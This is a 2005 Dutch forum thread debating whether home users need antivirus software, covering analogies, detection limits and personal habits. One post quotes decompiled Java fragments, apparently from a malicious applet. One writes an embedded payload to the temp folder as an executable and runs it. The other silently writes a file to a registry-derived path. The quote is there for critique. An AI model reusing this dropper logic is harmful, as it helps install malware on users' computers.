[...]
Ik vraag me af, waarom zou je geen virusscanner gebruiken?
- Neemt werk uit handen
- Weinig systeembelasting
- Kan gratis

Alleen maar om de moeite van het downloaden/installeren en je gedachte dat je het zelf wel kan regelen? Honderden gespecialiseerde werknemers werken elke dag aan de virusscanners om ze te verbeteren, optimaliseren om de nieuwste virussen tegen te houden, waarom denk je dat je dat zelf kan overtreffen? Je kunt ook niet alles alleen in de gaten houden, dat kun je toch beter aan een scanner overlaten? Daarnaast kan een scanner virussen opmerken die jij zelf niet zo kan zien. Wat als er een nieuwe soort virus ontdekt wordt waar je geen weet van hebt?

Uit het feit dat er nog steeds nieuwe virussen worden ontwikkeld, blijkt wel dat er voorlichting nodig is en kennelijk niet alleen aan de "huis-tuin-en-keuken" pc gebruikers (wie dat dan ook mogen zijn). Voor de mensen die denken dat een virusscanner veel geheugen gebruikt of vertraagd, etc. (na vroeger ooit een keertje een geprobeerd te hebben), probeer gewoon eens een nieuwe, goede virusscanner zoals NOD32, Kaspersky, Panda of AVG. Als je het niks vind (na echt geprobeerd te hebben), kun je toch altijd nog uninstallen? Je kan niet over een product oordelen als je het niet zelf geprobeerd hebt.

[ Voor 64% gewijzigd door Ruzor op 12-12-2005 20:22 ]

[This is what you get when you mess with us]

maandag 12 december 2005 22:29

Acties:

0 Henk 'm!

Verwijderd

pasta schreef op maandag 12 december 2005 @ 03:35:

Een prutsamateurvirus kan evengoed nog schade aanrichten aan het systeem. Daarbij lijkt dit nogal op een flame, dus kan je in het vervolg dit soort dingen of niet melden, of in een topic report melden.

code:

if (string_0_.startsWith("windows")) {
        StringBuffer stringbuffer = new StringBuffer(256);
        Kernel32.GetTempPath(256, stringbuffer);
        String[] strings = new String[1];
        strings[0] = new String(stringbuffer) + "q319243.com";
        int i = Kernel32.CreateFile(strings[0], 1073741824, 0, null, 2,
                        128, 0);
        Kernel32.WriteFile(i, m, 6144, new int[1], null);
        Kernel32.CloseHandle(i);
        Runtime.getRuntime().exec(strings);

je dacht toch niet dat zo'n rommel gaat werken als niet-admin?

code:

public static void AutoBmk(String string, String string_0_) {
    try {
        PolicyEngine.assertPermission(PermissionID.REGISTRY);
        String string_1_ = "\\";
        RegKey regkey = new RegKey(RegKey.getRootKey(3),
                       (d[24] + string_1_ + d[25] + string_1_
                    + d[22] + string_1_ + d[23] + string_1_
                    + d[28] + string_1_ + d[21]),
                       1);
        String string_2_ = regkey.getStringValue(d[27]);
        String string_3_ = d[29] + string_0_;
        String string_4_ = string_2_ + '\\' + string + d[26];
        try {
        FileOutputStream fileoutputstream
            = new FileOutputStream(string_4_);
        fileoutputstream.write(string_3_.getBytes());
        fileoutputstream.close();
        } catch (Throwable throwable) {
        /* empty */
        }
    } catch (Throwable throwable) {
        /* empty */
    }
    }

oops, we hebben alleen maar catches

[ Voor 60% gewijzigd door Verwijderd op 12-12-2005 22:48 . Reden: ot nullified :) ]

maandag 12 december 2005 22:52

Acties:

0 Henk 'm!

Rhannie

[DPC] Team Black Bulls

Maar als er wel wat gevonden wordt ben je wel de klos. Dan kan het virus al een half jaar op je PC staan en schade hebben aangericht. Beetje raar dat je zegt dat je geen virusscanner gebruikt omdat je nergens last van hebt. "Ik heb sex zonder condoom omdat ik nergens last van heb". Nofi, voor hetzelfde geld heb je een soa of erger Niet dat een condoom alles tegenhoudt, net zoals een virusscanner niet, maar zeker wel voor een groot deel.

Dat is een beetje een kromme vergelijking. Een SOA gaat niet weg met een format of met een virusscan. En ja, als er wat wordt gevonden dan is dat mogelijk een probleem. Maar aan de andere kant is dat altijd een beetje een gok. Als ik ervoor kies om geen virusscanner te gebruiken, dan is het mijn eigen schuld als er onverhoopt een virus op mijn PC geinstalleerd wordt. Ik vind het niet erg om mijn PC te formatteren als er een virus op staat die niet weg is te krijgen.

maandag 12 december 2005 23:42

Acties:

0 Henk 'm!

Ruzor

Off with his head man

Paddixx schreef op maandag 12 december 2005 @ 22:52:
[...]

Dat is een beetje een kromme vergelijking. Een SOA gaat niet weg met een format of met een virusscan. En ja, als er wat wordt gevonden dan is dat mogelijk een probleem. Maar aan de andere kant is dat altijd een beetje een gok. Als ik ervoor kies om geen virusscanner te gebruiken, dan is het mijn eigen schuld als er onverhoopt een virus op mijn PC geinstalleerd wordt. Ik vind het niet erg om mijn PC te formatteren als er een virus op staat die niet weg is te krijgen.

Dat is appels met peren vergelijken

Ik bedoelde:
- Virusscanner ter voorkoming (tijdig ingrijpen) van virus
- Condoom ter voorkoming van soa

Ik vind het ook zeker dat je (natuurlijk) de keuze hebt om wel of niet een virusscanner te gebruiken. Alleen de meeste (alle?) virussen zijn gebouwt om zich te verspreiden, het probleem daarbij is dat je erbij zou kunnen toedragen dat het virus zich idd verspreidt naar computers van anderen.

Ik vind eigenlijk dat elke computer standaard een firewall en virusscanner geinstalleerd moet hebben. Als virusmakers inzien dat de virussen geen effect meer hebben, alleen dan zo kun je ze uitroeien (utopie waarschijnlijk

[ Voor 12% gewijzigd door Ruzor op 12-12-2005 23:54 ]

[This is what you get when you mess with us]

maandag 12 december 2005 23:42

Acties:

0 Henk 'm!

hbsJR

All rounder

ik draai een router firewall met avast virusscanner. Daarnaast check ik wekelijks mijn systeem en check ik bijna wekelijks voor de laatste nieuwtjes op leaks en troep. Bezoek illegale sites via een crappy user account met uber beperkte rechten, die ik gelijk delete na het bezoeken ervan. En hoewel ik mijn virusscanner laat ratelen vertrouw ik de license agreement nooit en check ik elke bestand dubbel..

Hoezo paranioa?

ha en zelfs dan krijg ik af en toe een trojan binnen

maandag 12 december 2005 23:57

Acties:

0 Henk 'm!

Verwijderd

er zijn av-makers die zo grootmoedig zijn toe te geven dat signature-gebaseerde avsoft steeds minder zin heeft:analyse van Eugene Kaspersky himself
nog een relevant artikel op security.nl scanners nog waardelozer

en nog wat leesvoer:
http://www.securitypipeline.com/174910419?CID=rssfeed_pl_scp

langs de andere kant is av-soft die signatureloze detectie doet inefficiënt en te makkelijk te omzeilen, zo lijkt het erop alsof we op een impasse afstevenen.

dinsdag 13 december 2005 00:40

Acties:

0 Henk 'm!

Jimbolino

troep.com

hbsJR schreef op maandag 12 december 2005 @ 23:42:
ha en zelfs dan krijg ik af en toe een trojan binnen

Dan doe je toch echt iets fout, of je verstaat iets anders onder "binnen komen".

Enkele posts eerder werd namelijk beweerd dat je een virus op je systeem hebt op het moment dat het in je temporary internet files staat:

Bor de Wollef schreef op maandag 12 december 2005 @ 14:50:
Ook al heb je het pakket waarvoor het virus is geschreven: je hebt nog steeds het virus met de schadelijke payload op je systeem staan.

Dit is de grootste bullshit die er bestaat, want je hebt dan misschien wel de "payload" (enkele kb's) maar schadelijk is hij zeker niet. Dit is te vergelijken met apache servers die worden gescanned op IIS exploits. (veel topics hier op GoT gaan hierover; bange, ontwetende mensen die exploit code in hun logs van apache terug vinden)

Deze trend van ontwetendheid zie ik steeds vaker terug onder de AV gebruikers. Mensen die niet weten wat ze allemaal wel en niet op hun pc geinstalleerd hebben:

Daos schreef op maandag 12 december 2005 @ 17:04:
Elke Windows-PC heeft java. Zoek maar eens naar jview.exe en java.exe. Deze bestanden horen respectievelijk bij de Microsoft VM en Sun VM.

Omdat je niet wist dat je java hebt is er een grote kans dat je er nooit updates voor hebt geinstalleerd en dus gevoelig bent voor oude exploits.

Verder vind ik de vergelijking een virusscanner en een condoom een beetje krom, aangezien een virusscanner een virusinfectie niet tegenhoud, hij hem alleen detecteerd als hij plaats dreigt te vinden (en daarom soms te laat is, zie meerdere reacties in dit topic)

Een virusscanner is te vergelijken met een metaaldetector in een discotheek. Hij houd de meeste rommel buiten de deur, maar zo nu en dan komt er eentje door.

Weet je hoeveel garantie je krijgt bij de aanschaf van een virusscanner? GEEN
Dat is net zo veel garantie als ik er geen aanschaf.

Garantie heb je niet, zekerheid ook niet. Wat heb je wel? Een extra controle? Dat sommige mensen die extra controle wel nodig hebben, betekend niet dat ik dat wel nodig heb.
Het lijkt alsof de voorstanders van een AV niet verder kunnen kijken dan hun eigen wereldje. Bekijk het ook eens van de andere kant.

The two basic principles of Windows system administration:
For minor problems, reboot
For major problems, reinstall

dinsdag 13 december 2005 10:41

Acties:

0 Henk 'm!

hbsJR

All rounder

Tja, ik draai keurig me virusscanner en me dingetjes.. en een virusje op zijn tijd houd je weer scherp en frisjes. Zo vond ik het al vreemd explorer.exe een beetje zat te miepen.

dinsdag 13 december 2005 10:46

Acties:

0 Henk 'm!

Nimoleda

ik gebruik ook een virusscanner, avg free edition werkt perfect en ik heb nooit een virus,Ook ik gebruik vuurvosje

[ Voor 11% gewijzigd door Nimoleda op 13-12-2005 10:46 ]

dinsdag 13 december 2005 11:04

Acties:

0 Henk 'm!

Ruzor

Off with his head man

Jimbolino schreef op dinsdag 13 december 2005 @ 00:40:
[...]
Verder vind ik de vergelijking een virusscanner en een condoom een beetje krom, aangezien een virusscanner een virusinfectie niet tegenhoud, hij hem alleen detecteerd als hij plaats dreigt te vinden (en daarom soms te laat is, zie meerdere reacties in dit topic)

Een virusscanner is te vergelijken met een metaaldetector in een discotheek. Hij houd de meeste rommel buiten de deur, maar zo nu en dan komt er eentje door.

Weet je hoeveel garantie je krijgt bij de aanschaf van een virusscanner? GEEN
Dat is net zo veel garantie als ik er geen aanschaf.

Garantie heb je niet, zekerheid ook niet. Wat heb je wel? Een extra controle? Dat sommige mensen die extra controle wel nodig hebben, betekend niet dat ik dat wel nodig heb.

Maar de virusscanner zorgt er wel voor dat het virus zich niet infiltreerd in je systeem. Net zoals een condoom je tegen soa's o.i.d. beschermt. Nee, je krijgt geen garanties (= zekerheid i.d.g.), omdat deze niet te geven zijn.

Maar over een condoom gebruiken (of een ander voorbehoedsmiddel) krijg je ook geen garantie dat je niemand zwanger maakt. Toch gebruik je er een, waarom? Omdat het de kans aanzienelijk verminderd. Hetzelfde geldt voor een virusscanner. Tussen 0% een 100% ligt een hoop! Wel of geen metaaldetetector (die ook nog aangeeft wat de persoon bij zich heeft en waar en het eruit haalt en/of de bezoeker de toegang weigert) is een groot verschil zou ik zo zeggen...

Het is geen extra controle, maar een controle op zich. Waarom gebruik je een firewall? Waarom vertrouw je een firewall wel en een virusscanner niet?

[ Voor 7% gewijzigd door Ruzor op 13-12-2005 11:31 ]

[This is what you get when you mess with us]

dinsdag 13 december 2005 11:41

Acties:

0 Henk 'm!

Daos

Dat condoom-verhaal blijft maar terugkomen. Maar even een quote van mezelf daarover:

Daos schreef op woensdag 07 december 2005 @ 09:32:
Het grootste nadeel van de scanners is dat de gebruikers denken dat ze veilig zijn. Ze gaan het zelfs vergelijken met het gebruik van een condoom.
Vaak kom ik bij mensen die virussen hebben omdat ze gewoon overal op klikken (bv email-bijlagen). Als je dan vraagt waarom ze niet nadenken voordat ze klikken, dan zeggen ze dat dat niet hoeft omdat ze toch een virusscanner hebben.

dinsdag 13 december 2005 11:43

Acties:

0 Henk 'm!

The_Priest

Ruzor schreef op maandag 12 december 2005 @ 19:46:
[...]

Maar als er wel wat gevonden wordt ben je wel de klos. Dan kan het virus al een half jaar op je PC staan en schade hebben aangericht. Beetje raar dat je zegt dat je geen virusscanner gebruikt omdat je nergens last van hebt. "Ik heb sex zonder condoom omdat ik nergens last van heb". Nofi, voor hetzelfde geld heb je een soa of erger Niet dat een condoom alles tegenhoudt, net zoals een virusscanner niet, maar zeker wel voor een groot deel. Zie ook Bor de Wollef in "Wel of niet een virusscanner gebruiken?"

And again:

[...]

Uit het feit dat er nog steeds nieuwe virussen worden ontwikkeld, blijkt wel dat er voorlichting nodig is en kennelijk niet alleen aan de "huis-tuin-en-keuken" pc gebruikers (wie dat dan ook mogen zijn). Voor de mensen die denken dat een virusscanner veel geheugen gebruikt of vertraagd, etc. (na vroeger ooit een keertje een geprobeerd te hebben), probeer gewoon eens een nieuwe, goede virusscanner zoals NOD32, Kaspersky, Panda of AVG. Als je het niks vind (na echt geprobeerd te hebben), kun je toch altijd nog uninstallen? Je kan niet over een product oordelen als je het niet zelf geprobeerd hebt.

Ik zal me ook eens mengen in deze leuke discussie. Ik zal eerst eens lekker tegen jouw argumenten ingaan.

Als ik met een meisje naar bed ga, kies ik haar zorgvuldig uit en ken haar sowieso langer dan één avond. Ondertussen wordt de kans nou net zo groot om een SOA te krijgen om meteen de eerste beste slet te naaien met condoom wat ook niet 100% betrouwbaar is. Als iedereen net zoveel aandacht besteedt aan de software op een computer zou een virusscanner die niet 100% betrouwbaar is, want dat weet iedereen, gedeeltelijk overbodig zijn. Persoonlijk vind ik dat mensen die genoeg van computers weten, waarvan waarschijnlijk een aantal op deze forums rondzwerven, genoeg van computers om zonder virusscanner te werken. Wel raad ik dan aan om 1x per maand of misschien iets vaker een online scan uit te voeren. Ik doe dit ook zo en af en toe Hit Man Pro met de virusscanners aangevinkt. Niet dat ooit iets wordt gevonden op mijn computer want voordat ik ga scannen, gooi ik cookies en tijdelijke bestanden weg en dat zijn de enige bestanden waar wel eens wat verdachts in zit bij mij. Hit Man Pro gooi ik na de scan direct weer van mijn systeem. Ik installeer liever geen overbodige software op mijn systeem, waaronder bij mij een virusscanner valt. Wel installeer ik regelmatig virusscanners bij andere mensen, meestal AVG, prima scanner en gratis. Dit doe ik, omdat die mensen volgens mij ook liever de eerste beste slet naaien zonder condoom (niet letterlijk nemen he

). Ik denk dat je hieruit kunt concluderen dat ik genoeg virusscanners heb gebruikt en ervaring heb op dit gebied. Als je echt geen enkel risico wilt nemen kun je natuurlijk het beste goed opletten en een virusscanner installeren, daar ben ik echter te eigenwijs voor en zolang het op deze manier goed gaat, blijf ik hiermee door gaan.

Verder wil ik even wat kwijt over Windows updates, Windows firewall, en de firewall in een router. Ik heb dit ook allemaal maar vertrouw daar niet op. Als ik bij mijn broertjes en vader geen virusscanner installeer, waarvan de pc up-to-date is, Windows firewall aan staat en de firewall in de router ook aanwezig is, durf ik er geld op te leggen dat binnen één maand hun pc geinfecteerd is met spyware en virussen en na een half jaar hun besturingssysteem aan gort is.

dinsdag 13 december 2005 12:07

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Jimbolino schreef op dinsdag 13 december 2005 @ 00:40:
[...]

Dit is de grootste bullshit die er bestaat, want je hebt dan misschien wel de "payload" (enkele kb's) maar schadelijk is hij zeker niet. Dit is te vergelijken met apache servers die worden gescanned op IIS exploits. (veel topics hier op GoT gaan hierover; bange, ontwetende mensen die exploit code in hun logs van apache terug vinden)

Het virus is evengoed aanwezig ook al heb je de software dat het wil exploiten op dat moment niet op de PC staan. Ik wil zelf absoluut geen malware op mijn PC (zie ook mijn eerdere opmerkingen over bv internet banking), direct schadelijk of niet. Verder gaat je vergelijking met remote scanning ook niet op. In dat geval is het systeem niet vatbaar voor voor de exploit maar blijft de exploit code ook niet achter op het systeem.

Verder vind ik de vergelijking een virusscanner en een condoom een beetje krom, aangezien een virusscanner een virusinfectie niet tegenhoud, hij hem alleen detecteerd als hij plaats dreigt te vinden (en daarom soms te laat is, zie meerdere reacties in dit topic)

Onzin. Volgens jou geeft een virusscanner alleen een alarmpje als er een infectie plaats vind / dreigt plaats te vinden? Door het deleten / cleanen / in quarantaine stoppen van het geinfecteerde bestand word een infectie van het systeem voorkomen imho.

Daos schreef op dinsdag 13 december 2005 @ 11:41:
Dat condoom-verhaal blijft maar terugkomen. Maar even een quote van mezelf daarover:

[...]

Daarbij is nou al heel vaak aangegeven dat een virusscanner geen 100% beveiliging biedt (wat onmogelijk is voor welk product dan ook) en dat een virusscanner alleen absoluut niet genoeg is.

Verwijderd schreef op maandag 12 december 2005 @ 23:57:
er zijn av-makers die zo grootmoedig zijn toe te geven dat signature-gebaseerde avsoft steeds minder zin heeft:analyse van Eugene Kasperky himself
nog een relevant artikel op security.nl scanners nog waardelozer

en nog wat leesvoer:
http://www.securitypipeline.com/174910419?CID=rssfeed_pl_scp

langs de andere kant is av-soft die signatureloze detectie doet inefficiënt en te makkelijk te omzeilen, zo lijkt het erop alsof we op een impasse afstevenen.

Klopt, signature based detection heeft inderdaad minder zin dan eerder toen de malware nog relatief eenvoudig was. Dit neemt niet weg dat het nog steeds de beste manier is die met de huidige techniek efficient en met een goed detectiepercentage uitgevoerd kan worden. AV producenten staan daarnaast natuurlijk ook niet stil. Ook zij zijn altijd bezig met het onderzoeken van nieuwe technieken en detectiemethoden. Waar eeder alleen losse scanners op de markt werden gezet zie je bv steeds meer security suites die een groter scala aan risicobeperkende maatregelen hebben.

Wat is bv "te makkelijk te omzeilen"? Waar doelt men hier op? Is dit bv het percentage virussen dat niet direct gepakt word als het "in the wild" komt of iets totaal anders?

Security beperkende maatregelen behoeven altijd aanpassing omdat de dreigingen steeds geavanceerder en diverser worden (en zelfs toenemen in aantal). Dit is bij virusscanner niet anders. Dezelfde tendens zie je bv ook in de markt van firewalls tot zelfs huisdeursloten.

Kaspersky:

I think that a computer which is connected to the Internet is rather like sex - it can be safe, or it can be unsafe.

[ Voor 87% gewijzigd door Bor op 13-12-2005 12:26 ]

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

dinsdag 13 december 2005 14:02

Acties:

0 Henk 'm!

arietimmerman

Als je kijkt hoeveel virussen er wel niet zijn voor windows, je zou er bang van worden: http://www.virusalert.nl/?show=virussen .

Een van de redenen waarom ik Linux gebruik: geen virussen, laat staan een virusscanner nodig.

dinsdag 13 december 2005 14:08

Acties:

0 Henk 'm!

Jimbolino

troep.com

arietimmerman schreef op dinsdag 13 december 2005 @ 14:02:
Als je kijkt hoeveel virussen er wel niet zijn voor windows, je zou er bang van worden: http://www.virusalert.nl/?show=virussen .

Een van de redenen waarom ik Linux gebruik: geen virussen, laat staan een virusscanner nodig.

als je bekijkt hoeveel virussen er irl zijn, word je ook niet vrolijk van... maar om daarom niet meer buiten te komen? of om een mondkapje (extra bescherming) te dragen...

The two basic principles of Windows system administration:
For minor problems, reboot
For major problems, reinstall

woensdag 14 december 2005 14:23

Acties:

0 Henk 'm!

Verwijderd

Ik gebruik Avast maar ik zet het standard shield uit! Virussen kan je toch alleen maar binnen krijgen via het net of via een stickje (en ja OK ook vloppy's maar die gebruik in jaren niet meer). Mn PC is nu lekker responsive en toch beschermd. Ik doe natuurlijk elke maand een full system scan, gebruik firefox en ik doe geen domme dingen!

vrijdag 16 december 2005 16:45

Acties:

0 Henk 'm!

oheng

Ik had gisteren een PC (van een klant) waar ik een virusscanner op zette (er stond Avast op, maar die was verlopen). Ik had eerst handmatig gecontrolleerd op virussen. Ik vond niets. Echter, ik besloot voor de zekerheid AVG op te zetten. Binnen een paar vond AVG twee virussen die ik had gemist. 1 stond gewoon in de services lijst en 1 stond ergens tussen de drivers. Ik had er compleet overheen gekeken.

Een virusscanner is dus echt geen overbodige luxe, dat merk ik wel weer.

vrijdag 16 december 2005 22:21

Acties:

0 Henk 'm!

Jazekerrrrr

oheng schreef op vrijdag 16 december 2005 @ 16:45:
Ik had gisteren een PC (van een klant) waar ik een virusscanner op zette (er stond Avast op, maar die was verlopen). Ik had eerst handmatig gecontrolleerd op virussen. Ik vond niets. Echter, ik besloot voor de zekerheid AVG op te zetten. Binnen een paar vond AVG twee virussen die ik had gemist. 1 stond gewoon in de services lijst en 1 stond ergens tussen de drivers. Ik had er compleet overheen gekeken.

Een virusscanner is dus echt geen overbodige luxe, dat merk ik wel weer.

voor de normale mens niet nee.
Maar als je weet wat je doet heb je wel minder kans op een virus.
maar geen een mens heeft een spyware vrije pc want meestal merk je het nog niet eens of je spyware hebt dus ik vind een spyware scanner ook geen overbodige luxe.

vrijdag 16 december 2005 23:16

Acties:

0 Henk 'm!

Jimbolino

troep.com

Jazekerrrrr schreef op vrijdag 16 december 2005 @ 22:21:
[...]
maar geen een mens heeft een spyware vrije pc want meestal merk je het nog niet eens of je spyware hebt dus ik vind een spyware scanner ook geen overbodige luxe.

nou, dan ben ik "geen een mens"

Spyware merk je altijd als het erop komt. maar ja als je je pc niet beveiligd, en zomaar overal op OK klikt en altijd "Volgende, Volgende, Volgende" doet, zonder te lezen. Ja dan ben je waarschijnlijk ook dom genoeg om niet te merken dat je spyware op je pc hebt.

The two basic principles of Windows system administration:
For minor problems, reboot
For major problems, reinstall

vrijdag 16 december 2005 23:25

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Jimbolino schreef op vrijdag 16 december 2005 @ 23:16:
[...]

nou, dan ben ik "geen een mens"

Spyware merk je altijd als het erop komt. maar ja als je je pc niet beveiligd, en zomaar overal op OK klikt en altijd "Volgende, Volgende, Volgende" doet, zonder te lezen. Ja dan ben je waarschijnlijk ook dom genoeg om niet te merken dat je spyware op je pc hebt.

De infectie met spyware hoef je niet zo maar te merken. De kans of manual detection is groter na de infectie.

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

vrijdag 16 december 2005 23:43

Acties:

0 Henk 'm!

Verwijderd

Ach, laat ik ook eens replyen.

Ik ben eerlijk gezegd nogal verbaasd over de argumenten waar de pro AV mensen mee aankomen, de sterkste argumenten zie ik eigenlijk niet echt voorbij komen.
(Nee, ik voel niet echt de behoefte om deze te gaan opsommen).

Goed, eentje dan.

Als een grootheid als Russinovich 'ongewenste software' op zijn pc kan krijgen, hoe arrogant kun je dan zijn om te denken dat dat jou, als niet AV gebruikend persoon, welke in de verste verte niet aan de expertise van Russinovich kan tippen, dat niet kan gebeuren?

zaterdag 17 december 2005 00:07

Acties:

0 Henk 'm!

Jordi

#1#1

Schouw:

Wat een hoop onzin allemaal. Alsof elk stuk malware met een installer komt. Alsof elk stukje malware zich laat zien in proceslijsten, registry en directories. Alsof elk stukje malware de computer trager maakt. Alsof elk stukje malware zich verspreidt in e-mails.

Ja hoor, spyware merk je altijd als het er op komt. Ik klik dan ook altijd op de "Nee, installeer deze spyware niet en laat mij controle over mijn computer behouden". En als je alle vendor patches hebt geinstalleerd -een keer per maand updaten is toch ruim voldoende, alle malware schrijvers hebben immers een erecode geen exploits uit te brengen voor vulnerabilities die minder dan een maand oud zijn-, loop je inderdaad geen enkel risico dat er iets ongemerkt gebeurt op je systeem omdat je met de laatste patch beschermt bent tegen alles wat de internetwereld te bieden heeft. Elk opgestart of geinjecteerd stukje programmacode vraagt immers netjes toestemming of het je systeem mag vernaggelen. Malware kan onder een useraccount niks omdat vulnerabilities die leiden tot administrator/system rechten niet bestaan en ook niet zullen bestaan dankzij de inherente techniek van Microsoft. Exploits voor Firefox bestaan ook niet, want dat is open source. Slim opgemerkt!

"Virusscanners zuigen want ik heb product X gebruikt en dat werkte vertragend en herkende een virus uit het jaar 0 niet". Ja een Minicooper en een Fiat panda zijn kutauto's dus ik ga maar met de trein voortaan! En Bavaria is niet te zuipen dus koop ik maar geen bier meer! Goed zo!

Echt hoor... de argumenten die sommigen hier aanvoeren... je zal echt minder risico lopen door goed op te letten, maar die argumenten "ik check mijn system dir" en "ik check mijn processlist" en "ik installeer geen gratis software" zijn echt zoooooo 2002. Aan de andere kant, Thomas Hesse (Sony BMG) zei het al. "Most people don't even know what a rootkit is so why should they care about it". Als ik deze thread zo lees... misschien had hij wel gelijk

Het zal wel niet, maar het zou maar wel.

zaterdag 17 december 2005 11:03

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

Verwijderd schreef op vrijdag 16 december 2005 @ 23:43:
Ach, laat ik ook eens replyen.

Ik ben eerlijk gezegd nogal verbaasd over de argumenten waar de pro AV mensen mee aankomen, de sterkste argumenten zie ik eigenlijk niet echt voorbij komen.
(Nee, ik voel niet echt de behoefte om deze te gaan opsommen).

Beetje nutteloze opmerking als je daarbij niet met voorbeelden komt imho. Als je denkt dat er onwaarheden staan in de posts van het pro kamp hoor ik het graag

[ Voor 9% gewijzigd door Bor op 17-12-2005 11:03 ]

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

zaterdag 17 december 2005 11:05

Acties:

0 Henk 'm!

Miki

offtopic:
* offtopic: Schouw en Jotti leven nog $_/-\o_$

zaterdag 17 december 2005 11:16

Acties:

0 Henk 'm!

blackd

Bor de Wollef schreef op zaterdag 17 december 2005 @ 11:03:
Beetje nutteloze opmerking als je daarbij niet met voorbeelden komt imho. Als je denkt dat er onwaarheden staan in de posts van het pro kamp hoor ik het graag

Als je nou eens iets minder selectief quote, dan zie je al gelijk een van de belangrijkste argumenten?

9000Wp o/w SolarEdge SE6K - Panasonic 5kW bi-bloc - gasloos sinds 17-7-2023

zaterdag 17 december 2005 11:29

Acties:

0 Henk 'm!

CycloneX

Born on probation

Verwijderd schreef op vrijdag 16 december 2005 @ 23:43:

Als een grootheid als Russinovich 'ongewenste software' op zijn pc kan krijgen, hoe arrogant kun je dan zijn om te denken dat dat jou, als niet AV gebruikend persoon, welke in de verste verte niet aan de expertise van Russinovich kan tippen, dat niet kan gebeuren?

Grootheden mogen die dan geen fouten maken

Zelfde als Bill Gates die nooit een blauw scherm zou mogen hebben. Er zijn gewoon dingen waar je als gebruiker gewoon geen vat op hebt.

MacBook Pro “14” M4 Pro 24GB | iPhone 16 Pro | iPad Air 11-inch M2 | Denon AVC-X3800H | Q Acoustics 3050i

zaterdag 17 december 2005 11:36

Acties:

0 Henk 'm!

Bor

Coördinator Frontpage Admins / FP Powermod

01000010 01101111 01110010

blackd schreef op zaterdag 17 december 2005 @ 11:16:
[...]

Als je nou eens iets minder selectief quote, dan zie je al gelijk een van de belangrijkste argumenten?

Je doelt op "de sterkste argumenten zie ik niet voorbij komen"? Ik vind daarna namelijk niet echt sterke argumenten. Zoals CycloneX aangeeft kunnen ook grootheden fouten maken en nieuwe technieken niet doorzien.

Over Bor | Vraag & Aanbod feedback | Frontpagemoderatie Forum

zaterdag 17 december 2005 11:51

Acties:

0 Henk 'm!

Pwigle

Een virus kan je op verschillende manieren op je PC krijgen waarbij dit de meest voorkomende manieren zijn:
- Klikken op een dubieuze .exe (doen tweakers niet zo snel, al zal je het zonder scanner nooit weten)
- Via het www (als je browser up-to-date is zal dat niet zo snel gebeuren)
- Via een lek in Windows OF andere programma (SQL server bijvoorbeeld, je wordt ongeveer elke 2 seconde gescanned op een lek in je windows)

Het laatste punt ben je nu eenmaal afhankelijk van een derde partij zoals Microsoft. Ik vind het ronduit belachelijk dat mensen hierop vertrouwen en geen virusscanner installeren om zich extra te beveiligen.

We leven bijna in 2006, het internet is geen vriendelijk omgeving meer. Ik ben van mening dat een goede systeembeheerder op elke machine die aan het internet gekoppeld is en onder zijn verantwoordelijkheid valt:
- Windows patches snel installeerd na het uitkomen hiervan (al dan niet getest of via auto-update)
(hackers reverse engineering de windows update en gaan het lek exploiten)
- Een virusscanner installeerd die zichzelf update
- Gebruik maakt van een firewall die minimaal alles inkomend blocked (tenzij je een server draait uiteraard)
- Als je firewall het toelaat, ook alle niet gebruikte uitgaande poorten blocked zodat als er een virus in een netwerk is, hij zichzelf minder makkelijk kan verspreiden.

Het lezen van bepaalde reacties van mensen "ik heb geen firewall en virusscanner en alles gaat prima" doet mij mn haren uit mn hoofd trekken... hoe kunnen mensen nu nog zo naief zijn...

zaterdag 17 december 2005 12:10

Acties:

0 Henk 'm!

Verwijderd

Bor de Wollef schreef op zaterdag 17 december 2005 @ 11:36:
[...]

Je doelt op "de sterkste argumenten zie ik niet voorbij komen"? Ik vind daarna namelijk niet echt sterke argumenten. Zoals CycloneX aangeeft kunnen ook grootheden fouten maken en nieuwe technieken niet doorzien.

Je lijkt m'n punt te snappen, hoe kun je het dan geen goed argument vinden?

Het pro AV kamp blijft maar hameren op 'normale' cases, wat voor roeping heeft het nonAV kamp daar nou aan? Ze zijn toch immers op dit gebied stukken beter onderlegd dan die mensen?

zaterdag 17 december 2005 12:14

Acties:

0 Henk 'm!

Verwijderd

Verwijderd schreef op vrijdag 16 december 2005 @ 23:43:
Ach, laat ik ook eens replyen.

Ik ben eerlijk gezegd nogal verbaasd over de argumenten waar de pro AV mensen mee aankomen, de sterkste argumenten zie ik eigenlijk niet echt voorbij komen.
(Nee, ik voel niet echt de behoefte om deze te gaan opsommen).

Goed, eentje dan.

Als een grootheid als Russinovich 'ongewenste software' op zijn pc kan krijgen, hoe arrogant kun je dan zijn om te denken dat dat jou, als niet AV gebruikend persoon, welke in de verste verte niet aan de expertise van Russinovich kan tippen, dat niet kan gebeuren?

russinovich is ongetwijfeld een guru, maar een cd zomaar in je pc stoppen in admin mode met autoplay ingeschakeld is een amateuristische blunder op beveiligingsgebied. ik zou wat meer van je andere argumenten willen zien, want dit argument is wat te makkelijk onderuit te halen

zaterdag 17 december 2005 14:49

Acties:

0 Henk 'm!

Jimbolino

troep.com

Verwijderd schreef op zaterdag 17 december 2005 @ 12:14:
[...]
russinovich is ongetwijfeld een guru, maar een cd zomaar in je pc stoppen in admin mode met autoplay ingeschakeld is een amateuristische blunder op beveiligingsgebied. ik zou wat meer van je andere argumenten willen zien, want dit argument is wat te makkelijk onderuit te halen

en daarbij komt nog eens dat een virusscanner de "infectie" niet heeft weten te voorkomen.
Je kan nog zoveel beveiling op je pc hebben: Virusscanners, firewalls, anti-spyware. In dit geval had het allemaal geen donder uitgemaakt.

The two basic principles of Windows system administration:
For minor problems, reboot
For major problems, reinstall

zaterdag 17 december 2005 14:53

Acties:

0 Henk 'm!

jep

Geen virusscanner.

Hinderlijke, trage en vaak bloated software. Ik heb er een hekel aan. En ik heb geen virus

Ik scan wel eens online, maar je moet gewoon weten wat je doet.

Firefox + Thunderbird helpt al een hoop.

zaterdag 17 december 2005 15:14

Acties:

0 Henk 'm!

Verwijderd

Jimbolino schreef op zaterdag 17 december 2005 @ 14:49:
[...]

en daarbij komt nog eens dat een virusscanner de "infectie" niet heeft weten te voorkomen.
